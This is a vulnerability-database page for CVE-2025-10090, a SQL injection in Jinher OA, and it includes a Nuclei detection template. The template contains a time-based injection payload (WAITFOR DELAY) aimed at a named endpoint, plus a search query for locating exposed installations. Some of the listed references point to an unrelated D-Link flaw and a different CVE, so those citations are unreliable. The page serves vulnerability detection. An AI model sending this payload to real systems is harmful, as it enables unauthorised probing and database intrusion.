/Vulnerability Library

Jinher OA - SQL Injection

CVE-2025-10090
Verified

Description

jinher jinher_oa is an office automation software that facilitates workflow management and collaboration within organizations. It sits in the enterprise layer of the tech stack, is typically deployed as self_hosted, and—within the information_technology industry—serves the business_apps domain.

Severity

High

CVSS Score

7.3

Exploit Probability

2%

Published Date

February 10, 2026

Template Author

dhiyaneshdk

CVE-2025-10090.yaml
id: CVE-2025-10090

info:
  name: Jinher OA - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    jinher jinher_oa is an office automation software that facilitates workflow management and collaboration within organizations. It sits in the enterprise layer of the tech stack, is typically deployed as self_hosted, and—within the information_technology industry—serves the business_apps domain.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data theft or database compromise.
  remediation: |
    Update to the latest version.
  reference:
    - https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md
    - https://vuldb.com/?id.335869
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14528
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2025-10090
    epss-score: 0.01734
    epss-percentile: 0.82694
    cwe-id: CWE-74,CWE-89
  metadata:
    max-request: 1
    verified: true
    vendor: jinher
    fofa-query: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
  tags: cve,cve2025,time-based,sqli,jc6,jinher,vkev

http:
  - raw:
      - |
        @timeout 10s
        GET /C6/Jhsoft.Web.departments/GetTreeDate.aspx/?id=1;WAITFOR+DELAY+'0:0:6'-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id", "permissions")'
        condition: and
# digest: 4b0a00483046022100e761012e055a04f7a9ee6d98d1e1d0726325159c3fbf66c0d49a88cb2b6fd80a022100d3a8e2e4bf4f87204ed4285969c46e689c540225fd05f976756ce05c23d42348:922c64590222798bb761d5b6d8e72950
7.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVE ID:
cve-2025-10090
CWE ID:
cwe-74, cwe-89

References

https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.mdhttps://vuldb.com/?id.335869https://nvd.nist.gov/vuln/detail/CVE-2025-14528

Remediation Steps

Update to the latest version.